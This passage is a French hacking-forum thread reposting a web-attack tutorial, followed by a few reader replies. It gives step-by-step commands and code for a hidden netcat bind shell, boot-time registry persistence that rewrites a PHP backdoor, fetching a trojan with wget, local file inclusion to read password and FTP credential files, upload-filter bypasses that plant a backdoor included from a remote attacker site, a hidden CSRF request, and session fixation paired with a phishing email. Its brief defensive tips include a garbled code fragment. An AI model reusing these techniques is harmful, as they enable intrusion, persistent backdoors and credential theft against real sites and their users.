    Une fois le nc.exe uploader, on va l'exécuter et lui donner quelques paramètres.

    Shell>>

    Code:
    nc -L -p 23 -d -e c:\cmd



    -L signifie que netcat doit attendre des connections en permanence
-p 23 défini le port (23 telnet)
-d pour être cachée (la fenêtre ne sera pas visible)
-e c:\cmd redirige les inputs dans cmd

    Maintenant que le serveur est lancé, on va se connecter dessus.

    On prend notre outil telnet.

    (le caractère d'échappement est 'CTRL+$')

    Microsoft Telnet> open localhost 23 (localhost étant à remplacer par l'ip de la victime)

    Et voilà, on a notre shell.

    Microsoft Windows XP [version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\>dir
    05/06/2006 18:15 <REP> WINDOWS
    05/06/2006 18:20 <REP> Documents and Sett
    05/06/2006 18:33 <REP> Program Files
    05/06/2006 18:34 0 AUTOEXEC.BAT
    05/06/2006 18:50 <REP> NVIDIA
    03/01/1998 14:37 59.392 nc.exe
    05/08/2004 12:00 431.104 Cmd.exe
    3 fichier(s)
    490.496 octets
    4 Rép(s) 4.573.593.600 octets libres

    6.4. Backdoor permanente

    Ce qui permet au hacker d'avoir le contrôle sur une machine c'est la backdoor. Si celle-ci est bougée, ou que la faille est rebouchée, on n'aura plus accès à notre backdoor. On pourrait la cacher dans un dossier, mais un bon administrateur risque de trouver où nous cachons cette backdoor (en regardant les logs d'apache par exemple). Pourquoi ne pas la recréer à chaque démarrage ?

    Pour ce faire, il n'existe pas des centaines de possibilités (du moins sous Windows).

    Nous allons grâce au shell écrire dans la base de registre une chaîne dans [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window\CurrentVersion\Run] qui nous permettra de lancer un programme au démarrage de l'ordinateur.

    On va créer grâce au shell le .bat qui ajoutera la chaîne dans la base de registre.

    SHELL>>

    Code:
    echo REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Data /t REG_SZ /d C:\\backdoor.bat >addreg.bat

    Data étant le nom du processus à lancer et C:\dossiercache\backdoor.bat l'emplacement du générateur de backdoor.

    Attention à bien mettre des \\ car le caractère \ est effacé lorsqu'on fait le echo.

    Ensuite, il nous suffit d'appeler addreg.bat

    Si la chaîne a été correctement enregistrée, vous aurez un message "L'opération c'est bien déroulée".

    Maintenant, nous devons créer le fichier .bat qui se lancera à chaque démarrage.

    On va faire simple, on va la créer par un script PHP (createurbackdoor.php).


    Code PHP:
    <?php
    $fp
    =fopen("backdoor.bat","w+");
    //on crée la backdoor dans le répertoire du script, on le bougera après par cmd
    $cmdbackoor='@echo off
    echo "<?php @include($page);?>" > '
    .$DOCUMENT_ROOT.'/backdoor.php';
    fputs($fp,$cmdbackoor);&#8232;fclose($fp);
?>

    Laisser les " " autour du code PHP, sinon le code ne s'enregistrera pas dans le fichier à cause du > de fermeture de la balise php et le > pour l'écriture dans le fichier.

    On va devoir placer le fichier .bat dans C:\dossiercache.

    Il vaut mieux le déplacer par cmd dans le shell car apache ne permet pas tout le temps accéder en dehors de son lecteur virtuel.

    Et voilà, à chaque lancement de la machine, le fichier backoor.php sera créé.

    Il nous suffit de nous rendre sur la backdoor et d'inclure une backdoor distante pour reprendre le contrôle de la machine.

    On pourrait également uploader trojan.exe ou un autre service et le faire exécuter de la même manière à chaque démarrage !

    Pour uploader ce trojan, le plus simple est d'uploader wget. C'est un petit tools qui permet de télécharger des fichiers distants depuis votre shell.

    Une fois wget installé sur le serveur, on se rend sur notre shell.

    SHELL>>

    Code:
    pathdeweget/wget URL/host -P destination

    Et voila, on télécharge une petite surprise sur le serveur, et on va pouvoir l'exécuter !

    6.5. Include local et .htaccess

    Vous allez vous demander pourquoi je vous parle d'htaccess dans la faille include, et bien tout simplement parce-que grâce à cette faille on va pouvoir lire le .htaccess qui nous donnera le nom du fichier qui contient les pass.

    Un petit résumé du htaccess :

    Pour ceux qui ne connaissent pas, le .htaccess sert, entre autre, à sécuriser une partie du site en demandant un login et un mot de passe. Il sert aussi à pleins de trucs comme la personnalisation des erreurs 404 et 403, mais on ne s'intéressera ici qu'à la protection d'une partie du site.

    Cette protection ne s'applique pas qu'à l'index mais à tout le dossier et à ses sous-dossiers.

    Hormis grâce à la faille include, on ne peut pas trouver le mot de passe.

    Comment fonctionne la protection?

    Dans le dossier protégé, il y a un fichier nommé .htaccess. C'est ce fichier qui vous demande le login et le mot de passe.

    Voilà à quoi ça ressemble :


    Code:
    PerlSetVar AuthFile secret/passlist.txt
AuthName "Accès INTERDIT aux personnes non-autorisées"
AuthType Basic
require valid-user

    Alors voyons ce que ça dit. La première ligne dit où est le fichier avec tous les mots de passes. En effet, le .htaccess fait appel à un fichier texte avec tous les mots de passe en clair.

    Attention chez certains hébergeurs notamment multimania, ovh... le pass doit être crypté. Eh bien voila, il nous reste plus qu'à récupérer ce fichier !! Ici il se nomme passlist.txt, mais il pourrait très bien s'appeler pass.txt, psswd.txt, ou .htpasswd (nom générique).

    Revenons à notre include local :

    Imaginons ce script:


    Code PHP:
    <?php
@include("include/".$page);
?>

    Dans ce cas pas moyen de charger un script sur un serveur distant, mais on peut charger des pages/fichiers locaux dont nos .htaccess

    Imaginons l'arborescence du site:

    C:\
    |->SITE
 |->index.php (faille include local)
 |->admin
    |->.htaccess
    |->passlist.txt
    |->include
 |->accueil.htm
 |->contact.htm

    Adresse du genre : http://sitevictime.com/index.php?page=accueil.htm

    On veut lire ce que contient le .htaccess donc on va remonter les répertoires et se placer dans le dossier admin.

    Code:
    http://sitevictime.com/index.php?page=../admin/.htaccess

    On regarde le dossier contenant les mot de passe :

    Code:
    PerlSetVar AuthFile secret/passlist.txt
    On inclut passlist.txt et on obtient nos comptes utilisateurs.

    Hackademy:codesecret
    user: pass

    Généralement l'accès du serveur apache est limité (création d'une partition virtuelle contenant seulement les pages visitables) mais il arrive parfois que l'on puisse avoir accès à toute la machines.
    
Vous pourriez par exemple avoir accès au C:\ et vous promener partout !
    
Ce qui voudrait dire qu'on pourrait inclure et afficher ce qu'on veut et entre autre etc/password sous Linux !

    6.6 Les fichiers des clients ftp

    Il existe aussi des fichiers dont on ne fait pas assez souvent attention : les .ini et les .dat
    
Les clients FTP sauvegardent généralement les configurations des FTP visités dans des fichiers.
    
Si on récupère un de ces fichiers grâce à une faille include locale par exemple, on aurait accès au [Vous devez être inscrit et connecté pour voir ce lien]
    
Tout d'abord pour récupérer le fichier contenant le pass, il faut savoir où il se trouve.
    
Pour le moment je n'ai que 2 cas testés.

    Cute FTP et FTP Expert.

    Pour Cute FTP : c:\Program Files\GlobalSCAPE\CuteFTPFR\sm.dat
    Pour FTP Expert : c:\Program Files\Visicom Media\FTP Expert 3\sites.ini

    Bon maintenant imaginons que nous ayons le sm.dat ou site.ini. Que pourrions-nous faire avec??? Soit on installe le même client que notre victime et on remplace le fichier sm.dat ou site.ini par celui de la victime ou on décrypte le fichier.

    On va le décrypter, autant apprendre quelque chose. On l'ouvre avec bloc note.

    Pour cute ftp :

    Pour savoir quelle ligne nous intéresse, il suffit de regarder une IP, une adresse, UNE ADDRESSE FTP. Imaginons que ce soit chez Lycos, on va faire la recherche de ftp.membres.lycos.fr ou tout simplement Lycos et on va trouver quelque chose comme ftp.membres.lycos.fr#catax#®©þú§® (on ne se soucie pas des #)

    Analysons le fichier :
    
ftp.membres.lycos : c'est le serveur
catax : c'est le login
®©þú§® : c'est le pass crypté


    Pour FTP Expert :


    Code:
    [site un]
Hôte=ftp.hébergeur.com
Anonyme=0
Usager=login
SauvegarderMotDePasse=1
Mot de passe=ºCBC8C9CECFCC
Dossier serveur=
Port=21
Coupe-Feu=1
Dossier local1=
Dossier local2=
Dossier local3=
ServerType=0
Commentaire=""

    Le mot de passe ici aussi est crypté

    Code:
    (ºCBC8C9CECFCC)

    
Attention, ne vous préoccupez pas du º.

    
1 lettre du pass = 2 lettres du pass crypté ; donc attention.

    6.7. La faille NULL Byte :

    Explication:

    La faille vient du fait que lorsqu'on envoie un NULLBytes (%00 ou \0) dans une variable, PHP l'interprète comme donnée de la variable alors que le moteur PHP comme la fin d'un string.

    Exploitation:

    Avec le script suivant :


    Code PHP:
    <?php
@include($page.".html");
?>

    Ici on est obligé d'inclure des pages html, le nullbyte va nous servir à inclure toutes les extensions que l'on souhaite. Si on met page.php%00 , ce qui se trouve après $page n'est pas pris en compte. On inclura donc bien page.php

    Cette faille peut aller très loin =>http://www.victime.com/index.php?page=/admin/config.ini

    On arrive à afficher le contenu du fichier config.ini (celui qui contient les infos de connexion à la BDD).

    Pour info, il fut un temps, le NULL Byte permettait d'afficher le code source d'une page php.

    Cette faille à été rebouchée, mais on se sait jamais, un très vieux serveur à l'abandon...

    Si l'on demandait l'index.php?page=index.php%00.txt, la page faisait une include sur le code source de la page index.php sous format .txt

    Protection de la faille include en général :

    Cette faille est plus complexe à protéger du fait qu'il faut savoir ce que l'on compte inclure. Page externe au serveur, ou juste des pages en local. Dans quel dossier se trouve les pages à inclure, et est-ce le seul dossier...

    Je vais vous donner un code pour une include mais juste en local et permettant de ce déplacer dans les dossier.


    Code PHP:
    <?php
    if(empty($page))
    $page="accueil";
    $page=$page.".php";
    $page=trim(strtolower($page));              //on enlève les espaces et les majuscules
    //On empèche les caractères dangereux comme remonter un répertoire et le NULL Byte
    $page=str_replace("../","admin",$page);&#8232;$page=str_replace(";","admin",$page);
$page=str_replace("%","admin",$page);
    //On interdit l'inclusion de dossiers protégés par htaccess
    if(eregi("admin",$page))
    {
    echo 
    "accès interdit";
    }else
    {
    //On vérifie que la page soit bien sur le serveur
    if(@file_exists($page) && $page!='index.php')
    include(
    "./".$p 
    else 
    echo 
    "Cette page n'existe pas"

    ?>

    8. La faille upload

    Cette faille est tout aussi connue que la faille include, c'est d'ailleurs leurs utilisations successives qui permettent au hacker de prendre le contrôle du serveur (backdoorer le serveur).

    Explication:

    Imaginons que l'on puisse uploader un fichier sur un serveur.
    
J'upload mon script.php qui contient n'importe quel code arbitraire. Il suffit par la suite de chercher le dossier dans lequel se mettent les fichiers uploadés, et de le lancer pour qu'il s'exécute.

    Le cas ci-dessus est très simpliste. Mais l'idée reste la même.

    Imaginons ce formulaire:


    Code HTML:
    <FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD="post"><INPUT NAME="userfile" TYPE="file" size="20"><br><INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="10000000"><input type="submit" value="Envoyer"></FORM>

    Ce formulaire va permettre à l'utilisateur de sélectionner un fichier en local, de l'envoyer au serveur. Celui-ci, avant même d'effectuer le code de la page appelée (ici upload.php), aura placé le fichier dans un dossier temporaire (spécifié dans le php.ini).

    En regardant ce code, nous pouvons déduire les variables utilisées pour traiter le fichier (userfile) mais également voir la taille maximale du fichier autorisé (à vrai dire, il ne sert pas a grand chose, car la taille permise est située dans le php.ini).

    $userfile : contient l'emplacement du fichier sur le serveur.
$userfile_name : contient le nom du fichier. (coté client)
$userfile_size : contient la taille du fichier.
$userfile_type : contient le mime du fichier (ex: text/html, image/gif, etc.).

    Celui-ci est fourni par le browser et non par php, il existe certaines méthodes pour faire passer n'importe quel fichier pour le mime que l'on souhaite, mais nous y reviendrons plus tard.

    upload.php :


    Code PHP:
    <?php
echo$ use rf ile;
echo "<br>";
echo$ use rf ile _ name;
echo "<br>";
echo$ use rf ile _ size;
echo "<br>";
echo$ use rf ile _ typ e;
    if(copy($userfile,"upload/".$userfile_name))
    {
    echo "
    Fichier uploadé avec succès";
    }else
    {
    echo "
    Erreur !!!";
    }?>

    Voici le résultat lors de l'upload de AC1.gif

    
w:/var/tmp/\phpE2.tmp
AC1.gif
68749
image/gif
    Fichier copié avec succès

    8.1. Double extension

    Certains scripts ne font que vérifier l'extension du fichier, cette protection peut être bipassée en faisant une double extension (suivant les hébergeurs).

    On va d'abord créer un fichier .gif ; pour cela, ouvrez paint, créez une image de quelques pixels.

    Ensuite, on ouvre notre .gif avec un éditeur hexadécimal (pour moi hexiwin).

    Maintenant imaginons que l'on insère du PHP dans notre .gif et qu'on lui mette une double extension (.php.gif).
    Dans notre éditeur, on trouve un espace vide pour y rajouter une en-tête html ainsi qu'une petite include.

    On se retrouve donc avec notre fichier.php.gif

    
On l'upload, et maintenant l'upload se passe correctement.

    
On se rend à notre fichier.php.gif?test=http://www.sitepirate.com/backdoor.php

    
Et voila donc notre backdoor en place !

    ATTENTION

    J'ai testé cette faille sur plusieurs hébergeurs, et celle-ci n'est pas tout le temps présente. Cela viens du faite que certains hébergeurs prennent la première extension rencontrée (c'est le cas d'OVH et autre) alors que d'autres utilisent la dernière.

    Un test rapide vous permettra de voir si la faille est exploitable.

    Si vous ne voyez rien, c'est que la faille peut être utilisée, dans le cas contraire, vous apercevrez un bout de votre gif.

    8.2. Bypass mime vérification

    Certains scripts ne font que vérifier si le mime correspond aux types de fichiers autorisés. Prenons le cas d'un script dit sécurisé (uploadmime.php):


    Code PHP:
    <?php
    //On vérifie qu'un fichier a bien été sélectionné
    if(empty($userfile))
    {&
    #8232;echo " Veuillez séléctionner un fichier !";
exit;
    }//Vérification du mime
    if(!($userfile_type=="image/jpg" ||$ use rf ile _ typ e=="image/jpeg" ||$ user fi le _t ype=="image/gif"))
    {&
    #8232;echo "Seul les fichiers JPG/GIF sont autorisés<br / >";
exit;
    }//Déplacement du fichier dans le dossier de destination
    if(copy($userfile,"upload/".$userfile_name))
    {
    echo 
    "<br>Fichier uploader avec succès";
    }else
    {
    echo 
    "Erreur";
    }
    ?>

    Etant donné que c'est le browser (donc côté client) qui défini le mime, on peut le falsifier, et cela, assez facilement.

    
Je vais vous montrer comment le faire depuis FireFox avec un addon.

    
Cet addon s'appelle Tamper Data.

    Il permet de modifier les headers envoyés au serveur.
    
Une fois installé, ouvrez la page avec le formulaire d'upload.
    
Allez dans Outils>Altérer données

    Cliquer sur Démarrer Altération.

    On sélectionne notre fichier PHP, dans mon cas scripthack.php et on clique sur envoyer.

    Une nouvelle fenêtre s'ouvre, cliquez sur Altérer.

    On obtient l'header.

    Maintenant dans POST_DATA, on obtient un truc de ce genre :

    Code:
    -----------------------------41184676334\r\nContent-Disposition: form-data; name="userfile"; filename="scripthack.php"\r\nContent-Type:application/x-php\r\n\r\n<?php\r\n@include($test);\r\n?>\r\n-----------------------------41184676334--\r\n
    On modifie le mime, par un mime permis (ici on le remplace par image/gif).

    Code:
    -----------------------------41184676334\r\nContent-Disposition: form-data; name="userfile";
    filename="scripthack.php"\r\nContent-Type: image/gif\r\n\r\n<?php\r\n@include($test);\r\n?>\r\n-----------------------------41184676334--\r\n
    Cliquez sur ok, et admirez le résultat !
    Code:
    w:/var/tmp/\php28.tmp
scripthack.php <=notre fichier php
27
image/gif <= notre mime modifié
Fichier copié avec succès
    Et voila, le fichier est passé pour un fichier .gif !

    8.3 Sélection du répertoire de destination

    Une autre exploitation peut être utilisée dans le cas où le nom du fichier n'est pas modifié par le script d'upload ou si le fichier est écrasé lorsqu'on upload un fichier dont le nom est déjà utilisé.

    Voici le form :


    Code HTML:
    <FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD="post"><INPUT NAME="userfile" TYPE="file" size="20"><br><input type="submit" value="Envoyer"></FORM>

    On sait que la variable du fichier est userfile, on pourrait recréer le formulaire, le modifier pour changer la valeur du userfile_name, qui aura pour effet de changer le nom du fichier.


    Code HTML:
    <FORM ENCTYPE="multipart/form-data" ACTION="http://www.xxx.com/upload.php" METHOD="post"><INPUT TYPE="hidden" name="userfile_name" value="index.php"><INPUT NAME="userfile" TYPE="file" size="20"><br><input type="submit" value="Envoyer"></FORM>

    Ainsi si on upload notre fichier.php.gif, celui-ci sera renommer en index.php !

    Il ne nous reste plus qu'à accéder à notre index.php pour inclure notre backdoor.

    On peut aller le mettre où l'on veut dans l'arborescence du site :


    Code HTML:
    <INPUT TYPE="hidden" name="userfile_name" value="../../index.php">

    On pourrait dans le cas où un répertoire est protégé par un .htaccess, remplacer le .htpasswd avec nos passwords pour accéder à l'espace protégé.

    Encore mieux, si le serveur tourne sur un serveur linux, on peut remplacer les fichiers dans /etc/passwd et mettre ce que l'on souhaite comme nouveau pass.

    Protection de la faille upload :

    Il est assez difficile de mettre en oeuvre un filtre 100% fiable mais avec quelques vérifications, on peut limiter la casse.

    Premièrement, renommez les uploads avec des noms aléatoires et sans extension (seulement dans le cas des images, car la balise <img accepte des fichiers sans extensions).
    
Deuxièmement, vu que la vérification par mime est inefficace, il serait judicieux de lire le fichier et de proscrire tout les caractères<,>,?,&,; mais attention à leurs équivalents dans les autres encodages (urlencode, ascii...).

    8. Cross-Site Request Forgeries ou CSRF

    Explication:

    Vous n'avez probablement jamais entendu parler de cette faille, mais elle n'en est pas néanmoins dangereuse…

    Malgré la similitude de nom avec les Cross Site Scripting (XSS), le principe n'est pas vraiment le même (voir plutôt opposé).

    Contrairement au XSS où c'était l'utilisateur qui était la victime (récupération de son cookie...), ici l'utilisateur va sans le savoir être complice du hack.

    
A savoir que les CSRF peuvent être très puissantes et sont beaucoup plus dures à sécuriser que les XSS.
    
Les attaques CSRF vont permettre de faire exécuter une requête HTTP à l'insu d'une de ses victimes.

    Exploitation :

    Prenons un exemple simple :

    Un livre d'or, sur lequel on peut ajouter des messages mais aussi sans protection antiflood-antirobot (code de vérification aléatoire à entrer pour valider le message).

    
Pour bien faire, il faudrait savoir la requête qui est envoyée lorsqu'on envoie le post.
    
Pour cela, on va utiliser Ethereal, on configure la carte réseau à sniffer, et on clique sur capture.

    Ensuite on se rend sur le site, on prépare un message. Ensuite avant de cliquer sur envoyer, on lance la capture.

    On arrête la capture. Et maintenant on va voir les résultats.

    On cherche dans le protocole HTTP un POST (ou un get suivant la méthode d'envoi).

    On le sélectionne et en dessous on obtient pour HyperText Trasnfert protocole, la requête http envoyée.

    Juste en-dessous line-base text data, là-bas vous verrez les variables envoyées au script de réception.

    Dans la fenêtre on clique sur follow TCP stream afin d'avoir la requête en mode sélectionnable.

    Voici donc ce qu'on récupère :


    Code:
    POST /livre%20d%20or/livredor.php?action=ajout HTTP/1.1
Host: victime.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://victime.com/livre%20d%20or/li...;Content-Type: application/x-www-form-urlencoded
Content-Length: 111
pseudo=0k4pix&email=test%40test.com&message=Test+de+Cross-
Site+Request+Forgeries&site=http%3A%2F%2Fdfsfq&note=0HTTP/1.1 200 OK

    Maintenant ce qu'il faudrait faire, c'est une page php, qui enverra cette requête :


    Code PHP:
    <?php
    $reponse 
    ' ';
    //nos variables
    $req=('pseudo=0k4pix&email=test%40test.com&message=Test+de+Cross-
    Site+Request+Forgeries&site=http%3A%2F%2Fdfsfq&note=0'
    );
    $fp fsockopen('victime.com',8 0);&#8232;fputs($fp, "POST /test/livre%20d%20or/livredor.php?action=ajout HTTP/1.1\r\n");
fputs($fp, "Host: victime.com\r\n");
fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-Length: ".strlen($req)."\r\n\r\n");
fputs($fp, $req);
    while (!feof($fp))
    {
    reponse .= fgets($fp128);
    }
    fclose($fp);
    echo 
    nl2br(htmlentities($reponse));
    ?>

    Pour mieux la cacher, on va la mettre dans une balise <img> sur un site fréquemment visité (c'est ce site qui sera l'auteur du CSRF).

    Dans notre cas, le livre d'or va recevoir à chaque visite de la page piégée, la requête d'ajout d'un message.


    Code PHP:
    <img src="http://sitehasard.com/notrescript.php"

    Evidemment ceci n'est pas très dangereux, hormis un petit flood sur le livre d'or, rien ne risque d'être détruit. Mais on peux imaginer l'impact qu'une telle faille aurait sur un site d'e-commerce… Des commandes qui n'ont jamais eu lieu, des quantités pouvant être facilement modifiées (dans notre cas, pour la note on aurait pu mettre 15/10 sauf si une vérification de la note est effectuée).

    Cette faille est délicate à protéger, car on pourrait même vérifier que le Referer est bien le bon, mais on peut le modifier à souhait. Il suffit de rajouter le leader Referer : et l'url de la page contenant l'envoi du POST.

    Protection :

    Plutôt que faire un plagia d'un site, voici quelque conseils qui pourrait être utiles notamment le point 3 et 4 ICI

    9. Faille Session

    Explication :

    Les sessions permettent d'identifier un utilisateur en particulier et de lui attribuer des variables qui lui sont propres. Quand on se rend sur la page d'identification commençant par session_start(); le serveur débute ou reprend une session.

    En clair, le serveur crée un fichier (exemple: sess_ceaa1bc9f865b77f28f75c32623f242a) dans un dossier Sessions (dépend des configurations du serveur). Ce fichier contiendra toutes les variables de l'utilisateur. $_SESSION['logon'] dans notre script (session.php).

    Si le fichier existe déjà, vous pourrez donc lire ces variables depuis n'importe quelle page en utilisant le $PHPSESSID correspondant. Le PHPSESSID est la partie après le _ , c'est un nombre aléatoire qui définira l'utilisateur. A chaque nouvelle page demandée, le browser envoie ce sessid (généralement via GET ou par cookie). Ainsi, on peut suivre l'utilisateur sur l'ensemble du site.

    Les sessions sont valides un certain temps suivant la configuration du php.ini (souvent une trentaine de minutes).

    Donc si vous avez accès à un compte, ce ne sera que temporairement.

    Exploitation :

    Le but du hacker va être de récupérer ou de forcer un phpsessid identifié. Pour cela, il existe 3 méthodes. La 4ème étant un énorme coup de chance.

    1. Prédiction
    
2. Capture
    
3. Fixation
    
4. Directory Listing


    9.1 Prédiction

    Ce type d'exploitation est plus rare, il reviendrait à réussir à deviner un phpsessid valide et identifié. Ce qui est peu probable vu que le serveur génère aléatoirement ces infos. Mais cette variable peut prendre une valeur définie par le webmaster. Il distribue lui même ce sessid suivant une suite, il sera "aisé" de trouver la suite.

    9.2 Capture

    Ici le but va être de voler le phpsessid à un utilisateur déjà identifié qui visite le site. Cette faille va être utilisée en couple avec la faille XSS.

    Comme je l'ai dit plus haut, le phpsessid est transmit soit en GET soit en cookie.
    
Nous avons vu que l'on pouvait récupérer le cookie d'un utilisateur avec du javascript injecté dans le site. Ici on récupère une identification valide.

    Maintenant, dans le cas où le phpsessid est transmit par GET, on peut le récupérer en prenant le referer, c'est-à-dire récupérer la dernière page visitée (document.referer). Ensuite, lorsqu'on a le cookie, il suffit de l'injecter sur la page (revoir la faille XSS si vous avez oublié).

    9.3 Fixation

    Ici ça devient un peu plus technique, on va devoir forcer chez l'utilisateur un phpsessid que l'on aura choisi. Ainsi on connaitra sa valeur. Mais le plus dur reste à forcer l'utilisateur à utiliser notre phpsessid et à s'identifier.

    Premièrement, il va falloir forcer le sessid.

    On se rend sur la page d'identification (session.php)
    
On force le phpsessid en appelant la page de cette façon: http://www.xxx.com/session.php?PHPSESSID=4545

    
Pour info, voici ce que contient notre fichier de session à cette étape :


    Code:
    logon|s:7:"request";

    
On s'identifie en mettant n'importe quoi comme login et pass afin que la variable reçoive la valeur false.
    
Le fichier de session est créé. Voici ce que contient désormais notre fichier de session :


    Code:
    logon|s:7:"false";

    Maintenant que notre sessid est connu, il faut qu'un utilisateur s'identifie en l'utilisant. Pour ça, on va faire un peu de Social Engineering...

    Il n'y a pas de règles pour ce genre "d'attaque". Les techniques sont diverses, les pros de cette technique sont imaginatifs, créatifs, et sans scrupules. Ils se font passer pour un de vos amis, il vous invite à visiter un site. Sans que vous vous en rendiez compte, il vous vole des identifiants, des infos. Dans cette optique, il utilise aussi beaucoup de fakes (c'est-à-dire que des zones d'identification de site copié ; phishé (identique à l'original) sur lesquelles il vous envoie. Vous vous logguez et un script se charge de logger les login et pass, et effectue correctement la connexion pour que vous n'y voyez que du feu.

    Bon revenons-en à notre exploit. Ici on va envoyer un mail en prétextant n'importe quoi (une nouvelle offre, un problème de serveur...). On va envoyer un mail anonyme en demandant au visiteur de se connecter sur son compte et bien sûr on lui fournit le lien suivant :

    Code:
    http://www.xxx.com/session.php?PHPSESSID=4545
    Il va se connecter, et notre fichier de session va être enfin valide et identifié.


    Code:
    Fichier sess_45: logon|s:7:"true";

    Maintenant, on retourne sur la page d'identification [Vous devez être inscrit et connecté pour voir ce lien]

    Nous voilà identifié ! Magique? Non juste un hijack de session

    Protection :

    Le mieux, c'est recréer un nouveau phpsessid pour l'utilisateur qui s'est correctement identifié et non pas garder le phpsessid public (celui sur la page d'identification). De cette façon, l'exploitation par fixation ne pourra plus marcher.

    Afin d'être certain que l'utilisateur est bien celui qui s'est identifié, il faudrait sauvegarder l'IP de l'utilisateur dans la variable de session et la revérifier sur chaque page afin d'éviter que l'utilisateur ne se fasse voler sa session à cause d'une possible XSS.

    9.4. Directory Listing

    Ce n'est pas réellement une faille, mais ça peut faire pas mal de dégâts. En fait, directory listing permet de lister un répertoire et de voir ainsi tous les fichiers que contient un dossier. Dans le cas des sessions, certains hébergeurs publics et gratuits obligent le webmaster à mettre les sessions dans un sous-dossier "sessions" à la racine du [Vous devez être inscrit et connecté pour voir ce lien] Si le webmaster ne met pas d'index.htm, index.html, index.php... le dossier va être listé, et vous pourrez lire ce que contient les sessions.

    Hormis les sessions, cette faille permet de temps en temps de trouver des dossiers plus ou moins sensibles.

    Protection :

    Rien de bien compliqué, un index.html mis dans chaque répertoire fera l'affaire.

    10. Conclusion

    Sachez que même si vous (les webmasters) avez des scripts où vous sécurisez vos entrées, etc., il y aura toujours un risque, celui de la sécurité de votre hébergeur, mais également dans les scripts open source. Car c'est ceux-ci qui sont les plus dangereux car n'importe qui avec un exploit peut le faire (de plus le code est visible par tout le monde) : je ne le répéterai jamais assez : Arrêtez de faire vos sites à partir de vulgaires CMS !!!

    Pour ces scripts, la seule sécurité est de cacher la version du script, faire régulièrement les mises à jours, et ne pas hésiter à placer des .htaccess dans les dossiers plus sensibles plutôt que se fier aux sécurités mise en place par le scripts (problème de session, sql injection et j'en passe).


    Source : 0k4pix

    Dédicace à sakarov





    Voici un site où ils décrivent certaines de ces failles. De plus des défis assez simple sont présents pour vous entrainer.

    http://www.securite-info.org/index.html

    Si vous en avez d'autre, faites tourner !
    "Exeunt les délires de l'amour entés sur une pratique non maîtrisée du sexe. Exit derechef la passion voluptueuse qui fait voir l'être aimé toujours autre qu'il n'est et qui pousse à posséder ce qu'on ne peut pas posséder." Epicure

  • #2
    ahah ! enfoiré t'as volé mon tuto ! En même tant c'est pas le mien Mais il est excellent et présente bien les choses. J'avais demandé à Ch0capix si je pouvais poster son tutoriel sur mon forum, il m'avait dit : oui. Ca me fait penser qu'il faudrait que je l'invite ici...
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|

    Commentaire


    • #3
      Je ne sais pas si le sujet est de toi (), mais si c'est le cas, bravo . Il va falloir que je prenne le temps de tout lire tout à l'heure, je met ça en favoris et je lâche mon like

      Commentaire


      • #4
        Esque debuter par ce post et un bon moyen de debuter dans le hacking ?

        Commentaire

        Chargement...
        X